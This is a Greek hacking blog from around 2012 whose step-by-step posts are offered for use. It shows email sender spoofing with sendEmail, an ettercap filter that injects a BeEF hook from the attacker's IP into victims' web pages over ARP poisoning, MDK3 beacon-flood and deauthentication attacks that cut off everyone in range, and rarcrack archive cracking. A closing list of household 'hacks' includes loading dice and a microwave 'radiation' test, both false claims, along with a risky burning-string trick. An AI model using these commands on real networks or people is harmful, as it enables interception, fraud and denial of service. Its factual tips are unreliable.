  • μετα πηγαινετε στο  http://www.ip-adress.com/ip_tracer/ και γραψτε την ip πχ εγω πηρα ενα μηνυμα της Groupon  και ανακαλυψα οτι το μηνυμα σταλθηκε απο Γερμανια.το οποιο μας λεει οτι η Groupon ειναι Γερμανικη εταιρεια και η Ελληνικη ειναι franchise.

     
    Απλα να ξερετε οτι το email το εντοπιζετε μεχρι την ISP υπηρεσια του
    και οχι στο σπιτι του αποστολεα και για να το εντοπισετε ακριβως πρεπει να επικοινωνησετε με την υπηρεσια πχ για Ελλαδα Forthnet ,ΟΤΕ,Ηol κλπ  και μονο αυτες μπορουνε να σας δωσουνε την ακριβη τοποθεσια εφοσον υπαρχει λογος σοβαρος(συνηθως οταν υπαρχει ποινικη διωξη)

     

     

Σάββατο 7 Ιανουαρίου 2012

SendEmail καντε πλακα στους φιλους και γνωστους σας

Με αυτο τον οδηγο θα σας δειξω πως μπορειτε να στειλετε email και να βαλετε οτι email θελετε για αποστολεα
* ο οδηγος εχει ανανεωθει 13.01.2015*


Τι θα χρειαστειτε;

1.Backtack 5 R1 / Kali Linux


*Για Kali linux
 leafpad /usr/share/perl5/IO/Socket/SSL.pm
και αλλαζουμε  την γραμμη
m{^(!?)(?:(SSL(?:v2|v3|v23|v2/3))|(TLSv1[12]?)&}i     με
m{^(!?)(?:(SSL(?:v2|v3|v23|v2/3))|(TLSv1[12]?))}i
αποθηκευουμε
η εντολη για να στειλουμε ειναι

sendemail -f jennaJemason@pornsar.net -t Thyma@hotmail.com -u Hello Greek Tsolia -m  Jenna is looking for Greek Star are you interesting? -s smtp.gmail.com:587 -xu ********@gmail.com -xp ******* -o tls=yes

  •  ανοιγω ενα τερματικο και γραφω
  • sendEmail -f jennaJemason@pornsar.net -t Thyma@hotmail.com -u Hello Greek Tsolia -m Jenna is looking for Greek Star are you interesting? -s smtp.googlemail.com -xu *******@gmail.com -xp ************
  • οπου
  • -f το email του αποστολεα
  • -t το email του θυματος
  • -u την επικεφαλιδα του μηνυματος
  • -m το μηνυμα
  • -s την υπηρεσια smtp για gmail ειναι αυτη που βλεπετε πανω
  • -xu το gmail σας (καλυτερα να φτιαξετε ενα τυχαιο)
  • -xp ο κωδικος του gmail σας
  • αν θελετε μπορειτε να μην βαλετε την επιλογη -m και θα γραψετε μετα το μηνυμα απλα πρεπει να γραψετε μεσα σε ενα λεπτο την πρωτη γραμμη και μετα οταν γραψετε το υπολοιπο μερος του πατηστε ctrl+d και θα αποσταλθει
  • επισεις αν θελετε να στειλετε συννημενο το στελνετε με την επιλογη -a και ακολουθει η διευθυνση του αρχειου που θελετε να στειλετε πχ sendEmail -f jennaJemason@pornsar.net -t Thyma@hotmail.com -a /root/arxeio -u Hello Greek Tsolia -m Jenna is looking for Greek Tsolia Are you interesting? -s smtp.googlemail.com -xu **********@gmail -xp ***********
  • και στο θυμα θα του εμφανιστει αυτο


  • http://www.sendanonymousemail.net/  και http://emkei.cz/ εδω μπορειτε να στειλετε μεσω του browser σας αν εχετε αλλο λειτουργικο πχ windows,mac κτλ.

 



Τετάρτη 4 Ιανουαρίου 2012

Browser explotation framework (BeEF)Πως εισβαλετε σε υπολογιστη μεσω του browser του


Αυτος ο οδηγος ειναι παρανομος αν εφαρμοστει σε ξενο λειτουργικο συστημα και ξενο δικτυο

Τι θα χρειαστειτε;

1.Backtrack 5 R1
2.Cross-Site-Sctript (xss)


  • πριν αρχισουμε παταμε στην επιφανεια εργασιας μας δεξι κλικ και δημιουργουμε ενα εγγραφο το ονομαζουμε xssbeef, αντιγραφουμε αυτα μεσα
  • #Nickthesail0r
    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
               replace("Accept-Encoding", "Accept-Nothing!");
          }
    }
    if (ip.proto == TCP && tcp.src == 80) {
        if (search(DATA.data, "</head>")) {
            replace("</head>", "</head><script src=\"http://192.168.1.66/beef/hook/beefmagic.js.php\"></script> ");
            msg("EPIASES_LAYRAKI\n");
        }
        if (search(DATA.data, "</HEAD>")) {
            replace("</HEAD>", "</HEAD><script src=\"http://192.168.1.66/beef/hook/beefmagic.js.php\"></script> ");
            msg("epiases_layraki\n");
        }
    }
  • πρεπει να βαλεις την δικια σου ip στο http://192.168.1.66
  • μετα παμε Applications-Backtrack-Explotations tools-Social Engineer tools-Beef xss framework-beef
  • παταω δεξι κλικ στο interface : http://127.0.0.1/beef/ open link και με παει στο γραφικο περιβαλλον του BeEF (στην σελιδα δλδ)

  • αλλαξε το http://127.0.0.1/beef με την δικια σου ip πχ http://192.168.1.66/beef ,πατα apply config και finished 
  • τωρα για να δειτε τι κανει το beEF ακριβως μπορεις να το δοκιμασεις σε εσενα αν πας στο view spawn zombie example
     και θα σας εμφανιστει μια σελιδα που θα λεει beEF test page μην την κλεισετε .πηγαινετε εκει που λεει standard modules και θα δειτε διαφορες επιλογες oπως πχ Alert dialog θα του στελνει μηνυμα

  • και στο χρηστη θα του εμφανιστει αυτο σε οποια σελιδα ειναι και εφοσον ειναι ευαλωτη σε xss 

  • Υπαρχουνε παρα πολλες επιλογες οπως να εισβαλετε στον υπολογιστη του να τον ανακατευθυνετε σε αλλη σελιδα κτλ
  • τωρα πως κανουμε το θυμα να ενωθει μαζι μας;
  • ειναι πολυ ευκολο απλα ανοιγουμε πρωτα ενα τερματικο και γραφουμε
  • etterfilter /root/Desktop/xssbeef -ο xssbeef.ef
  • μας εμφανιζει αυτο
  • etterfilter NG-0.7.4_git copyright 2001-2011 ALoR & NaGA


     12 protocol tables loaded:
        DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

     11 constants loaded:
        VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

     Parsing source file '/root/Desktop/xssbeef'  done.

     Unfolding the meta-tree  done.

     Converting labels to real offsets  done.

     Writing output to 'filter.ef'  done.

     -> Script encoded into 20 instructions.
  • μετα γραφουμε στο τερματικο ettercap -G μας ανοιγει το ettercap σε γραφικη μορφη παταμε shift+u επιλεγουμε wlan0 μετα ctrl+s ,Η επιλεγουμε target 1 το ρουτερ ,παμε mitm,arp poisoning.sniff remote connections παταμε ctrl+f παταμε το εικονιδιο home και επιλεγουμε το xssbeef.ef οπως στην εικονα 
  • τελος παταμε ctrl+w και περιμενουμε μεχρι να δουμε στο ettercap ''epiases_layraki'' οταν το δουμε αυτο παμε στο BeEF βλεπουμε οτι εχουμε zombies(χρηστες) * αν εχετε το ettercap lazarous γραψτε αυτη την εντολη στο τερματικο σας ettercap -T -M arp // // -F '/root/xssbeef.ef'  -i wlan0


Πως θα φτιαξετε τα δικα σας linux

Τι θα χρειαστειτε;

1.Συνδεση στο ιντερνετ

  • πατηστε εδω  καντε εγγραφη και αρχιστε να τα κατασκευαζετε με πολυ ευκολο τροπο
  • start δινετε το ονομα στα linux σας
  • software βαζετε οτι προγραμματα θελετε
  • configuration φτιαχνετε την εμφανιση του linux σας
  • files βαζετε οτι αρχεια θελετε πχ εγω εβαλα φωτογραφιες,και λεξικα για σπασιμο ασυρματω δικτυων
  • build τα κατασκευαζετε και τα κατεβαζετε 
  • αν επιλεξετε test drive τα δοκιμαζετε





  •  Nickthesail0r linux download 
  • κωδικος root/linux

Τρίτη 3 Ιανουαρίου 2012

MDK3 φερτε τον πανικο σε ασυρματα δικτυα

ΠΡΟΣΟΧΗ εφαρμοζοντας αυτον τον οδηγο σε ξενα δικτυα ειναι παρανομος καθως και πολυ ενοχλητικος ΔΕΝ ευθυνομαι για κακοβουλη χρηση του.


Τι θα χρειαστειτε;

1.Backtrack 5 R1

  • ανοιγουμε ενα τερματικο και γραφουμε airmon-ng start wlan0
  • mdk

  •  εδω μας εμφανιζει καποιες επιλογες εγω θα σας δειξω μερικες για να δειτε τι μπορειτε να κανετε
  • Beacon flood mode
  • mdk3 mon0 b  
 - με αυτη την επιλογη μπορειτε να στειλετε ψευτικα δικτυα σε ολη την γειτονια και αν γραψετε mdk3 b --help θα σας εμφανισει διαφορες επιλογες οπως 

  • mdk3 mon0 b -n nickthesail0r  - το ονομα των δικτυων θα λεγετε nickthesail0r
  • mdk3 mon0 b -f /root/diktya.txt -οπου στο αρχειο diktya θα βαλετε εσεις τα ονοματα που θελετε να εκπεμπουνε 
  •  mdk3 mon0 b -t -f /root/diktya.txt -oπου -t θα λεει οτι τα δικτυα μας ειναι με wpa κωδικοποιηση
  • Authentication DoS mode   
  •  mdk3 mon0 a - με αυτη την επιλογη μπορει να παγωσει τα ρουτερ η να τα κανει reset επισεις σας λεει αν καποιο ρουτερ ειναι ευαλωτο και αν θελετε συγκεριμενα για ενα ρουτερ απλα γραψτε mdk3 mon0 a -a mac address του ρουτερ
  •  Deauthentication / Disassociation Amok Mode
  •  mdk3 mon0 d με αυτη την επιλογη αποσυνδεετε ολους του χρηστες που ειναι στην εμβελεια σας 

  •  mdk3 --help d μας δινει διαφορες επιλογες οπως

  •  mdk3 mon0 d -w /root/white.txt οπου στο αρχειο white θα εχω γραψει την mac address μου θα μου επιτρεπει να εχω συνδεση στο ιντερνετ εκτος απο ολους τους αλλους που ειναι στην εμβελεια μου συνηθως το κανετε αυτο αν ειστε σε κοινο χωρο σχολειο,αεροδρομιο κτλ

Πως θα προστατευτειτε;

1.Αλλαξτε τις ρυθμισεις στο ρουτερ σας να μην δεχετε αλλους σταθμους και σε wpa2 αν εχει αυτη την επιλογη
2.Ο καλυτερος τροπος για να προστατευτειτε ειναι να ειστε συνδεδεμενοι ενσυρματα και οχι ασυρματα στο δικτυο σας

Δευτέρα 2 Ιανουαρίου 2012

Πως σπαω κλειδωμενα συμπιεσμενα αρχεια(winrar,7zip,7z)



Τι θα χρειαστειτε;

1.Backtrack 5 R1
2.rarcrack download

  • Αφου εχουμε κατεβασει το rarcrack
  • μεταφερουμε το rarcrack στο φακελο root αν ειναι στο φακελο downloads
  • μετα ανοιγουμε ενα τερματικο και γραφουμε
  • tar -xjf rarcrack-0.2.tar.bz2
  • cd rarcrack-0.2
  • make
  • make install
  • οποτε ειμαστε ετοιμοι 
  • στην συνεχεια γραφουμε cd /root/rarcrack-0.2
  • και μετα ./rarcrack --type rar --threads 8 /root/nickthesail0r.rar και περιμενουμε
  •  παταμε ctrl+c για να κανουμε ποιο συντομη την διαδικασια απλα στο αρχειο nickthesailor.rar.xml που θα μας δημιουργηθει βαζουμε μονο αριθμους η μονο γραμματα  και ξαναρχιζουμε παλι πχ 
  • <?xml version="1.0" encoding="UTF-8"?>
    <rarcrack>
      <abc>0123456789</abc>
      <current>0</current>
      <good_password/>
    </rarcrack>
το αρχειο nickthesail0r.rar θα το βρειτε εδω

Παρασκευή 30 Δεκεμβρίου 2011

Διαφορα Hack

Εφαρμοζοντας αυτες τις οδηγιες ειναι με δικο σας ρισκο καθως δεν ευθυνομαι για τυχον ζημια που μπορει να προκληθει αν κατι παει στραβα

Ζαρια

Πολλες φορες θα θελατε να φερνατε παντα εξαρες στα ζαρια.Ενας τροπος για να το κανετε αυτο ειναι να παρετε τα ζαρια να τα βαλετε με τις εξαρες να δειχνουν προς τα πανω μεσα σε ενα ταψι στο φουρνο και να τα αφησετε στους 180 βαθμους για 20-25 λεπτα. Με αυτο τον τροπο το βαρος θα παει προς τα κατω ,οποτε οταν τα πετατε καθως το πανω και ελαφρυτερο μερος τους που θα δειχνει προς τα πανω θα μας δειχνει παντα εξαρες οσες φορες και αν τα πεταμε

Μαγνητες

Διαφοροι τροποι που μπορειτε να χρησιμοποιησετε τους μαγνητες ειναι :
Στο φιλτρο λαδιου του αμαξιου.Περνετε και βαζετε ενα μαγνητη δυνατο στο πανω μερος και με αυτο το τροπο εμποδιζει να περνανε τα ρινισματα στην μηχανη
οταν εχετε ανεμιστηρακι η οποιαδιποτε συκευη που δουλευει με μοτερ μπορειτε να βαλετε ενα μαγνητη πανω και θα ανεβασει τις στροφες.
μπορειτε να μαγνητισετε το κατσαβιδι σας ετσι ωστε να πιανετε ποιο ευκολα τις βιδες απλα περνετε τον μαγνητη και τον τριβετε προς την μια κατευθυνση 5-6 φορες απο πανω προς τα κατω στο σιδερενιο μερος απο το κατσαβιδι.

Ψυξη σε 2 λεπτα

αν θελετε να παγωσετε διαφορα αναψυκτικα η ποτα σε 2 λεπτα απλα παρτε παγακια βαλτε τα σε ενα μπολ βαλτε λιγακι νερο και προσθεστε μια χουφτα αλατι αφηστε τα αναψυκτικα για 2 λεπτα και ειστε ετοιμοι.

Μπουκαλι  κομμενο στην μεση

ενας ευκολος τροπος να κοψετε ενα μπουκαλι στην μεση ειναι να παρετε ενα κορδονι(μαλλινο) να το ποτισετε με οινοπνευμα η ζιπελαιο να το δεσετε στο μπουκαλι και να το αναψετε ετσι ωστε να υπαρχει ενα στεφανι απο φωτια γυρω του.και το μπουκαλι εχει κοπει στην μεση ομοιομορφα.


Μπογιες και κολλες

ενας πολυ ευκολος τροπος για να βγαλετε μπογιες η κολλες απο τα χερια σας ειναι να παρετε λιγο λαδι και να το τριψετε πανω στην επιφανεια η στο χερι σας που θελετε να βγαλετε την μπογια/κολλα.

Ειναι ο φουρνος μικροκυματων σας ασφαλης;

ενας πολυ απλος τροπος για να το εξακριβωσετε ειναι να παρετε το κινητο σας να το βαλετε μεσα στον φουρνο μικροκυματων να κλεισετε την πορτα και να καλεσετε το κινητο σας.Αν χτυπισει παει να πει οτι ο φουρνος μικροκυματων σας αφηνει την ραδιενεργεια να βγει προς τα εξω οποτε καλυτερα να παρετε αλλον.

Καφες ελληνικος

τον βαζουμε σε ενα αλουμινοχαρτο και τον αναβουμε με αναπτηρα. Το αρωμα του καλυπτει ολες τις μυρωδιες επισεις διωχνει τα κουνουπια και τις σκνιπες

Κινητο μεσα σε υγρο

ενας ευκολος τροπος για να γλυτωσετε το κινητο σας οταν σας εχει πεσει μεσα σε υγρο.Κατευθειαν βγαζετε την μπαταρια σκουπιζετε τα πολλα νερα και επειτα βαζετε το κινητο μεσα σε ενα ταπερ με λιγακι αλατι η σιλικονουχα μπαλακια σαν και αυτα που εχουνε τα παπουτσια οταν τα αγοραζουμε το αφηνετε για 1 μερα ετσι ωστε να τραβηξει ολη την υγρασια και το νερο και αν δεν προλαβε να βραχυκυκλωσει τοτε θα λειτουργει μια χαρα.

Πιτσα σε 20 λεπτα 

ενας πολυ γρηγορος τροπος για να φτιαξετε πιτσα ειναι να παρετε ψωμια του τοστ να τα μουσκεψετε με γαλα να παρετε ενα ταψι να απλωσετε τα μουσκεμενα τοστακια μετα να προσθεσετε ζαμπον τυρι μπεικον και οτι υλικα θελετε να τα βαλετε στον φουρνο για 20 λεπτα στους 200 βαθμους ετσι ωστε να λιωσουνε τα τυρια και ειστε ετοιμοι.

Αντικλειδι σε 10 λεπτα

ενας πολυ ευκολος τροπος για να φτιαξετε αντικλειδι ειναι να παρετε το κλειδι σας να παρετε ενα σαπουνι να το αποτυπωσετε πανω και μετα να παρετε ενα πλαστικο  να το λιωσετε με αναπτηρα πανω απο το αποτυπωμα στο σαπουνι.ετσι θα εχετε φτιαξει ενα πλαστικο κλειδι

Πως θα ανοιξετε μια κλειδωμενη βαλιτσα με φερμουαρ με ενα στυλο

Απλα περνετε το στυλο το βαζετε στα δοντακια και τραβατε λιγακι προς τα πανω και με το στυλο κανετε δεξια η αριστερα και ανοιγετε περισσοτερο το ανοιγμα.για να την κλεισετε απλα παρτε το φερμουαρ με την κλειδαρια και τραβηξετο  μεχρι να κλεισουνε παλι τα δοντακια.με αυτο τον τροπο ελενχουνε στα αεροδρομια τις βαλιτσες μας χωρις να το ξερουμε.

Πως θα κανετε το ασυρματο στικακι σας να εχει μεγαλυτερη εμβελεια

Απλα περνετε ενα κουτακι αναψυκτικου το κοβετε απο πανω γυρω γυρω και το κοβετε σαν λουλουδι, στο κατω μερος κανετε μια τρυπα ετσι ωστε να περναει το μισο στικακι και με ενα καλωδιο usb επεκτασης το ενωνετε με τον υπολογιστη σας.και ειστε ετοιμοι.μπορειτε να το βαλετε και εξω απο το παραθυρο σας αν εχετε μακρυ καλωδιο.

Γδαρμενα cd/dvd

Ενας ευκολος τροπος για να ξαναπαιξουνε τα γδαρμενα cd σας ειναι να παρετε οδοντοκρεμα με baking soda και να τα αλειψετε με ενα πανακι.και να τα σκουπισετε μεχρι να φυγει τελειως η οδοντοκρεμα.Με αυτο τον τροπο απλα γεμιζετε τα κενα απο τις γρατσουνιες με την οδοντοκρεμα ετσι ωστε να μην αντανακλα η ακτινα του λειzερ και να τα διαβαζει το cd player σας
  
Διπλος καθρεφτης

Ενας τροπος για να δειτε αν ενας καθρεφτης ειναι διπλος δλδ αν σας βλεπουνε πισω απο ενα καθρεφτη ειναι να βαλετε το δακτυλο σας να ακουμπισει τον καθρεφτη αν υπαρχει εστω και χιλιοστο αποσταση τοτε ειναι διπλος αλλιως ειναι κανονικος καθρεφτης*(προσεξτε σε ξενοδοχεια,τουαλετες κτλ)